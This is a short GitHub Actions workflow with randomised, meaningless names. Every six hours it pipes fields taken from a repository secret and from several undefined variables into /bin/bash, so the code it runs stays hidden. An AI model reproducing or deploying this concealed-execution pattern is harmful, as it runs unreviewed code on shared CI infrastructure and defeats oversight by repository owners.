name: zhongpingcui1234

on:
  workflow_dispatch:
  schedule:
    - cron: '44 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhongpingcui1234
        env:
          nno3: ${{ secrets.nno3 }}
        run: |
          echo $nno3 | jq -r .hywqr0 | /bin/bash
          echo $ade4 | jq -r .hq6530 | /bin/bash
          echo $nuzmd8220 | jq -r .zpp9824 | /bin/bash
          echo $ctxp1 | jq -r .btzxc45 | /bin/bash
          echo $xn496 | jq -r .w2955 | /bin/bash

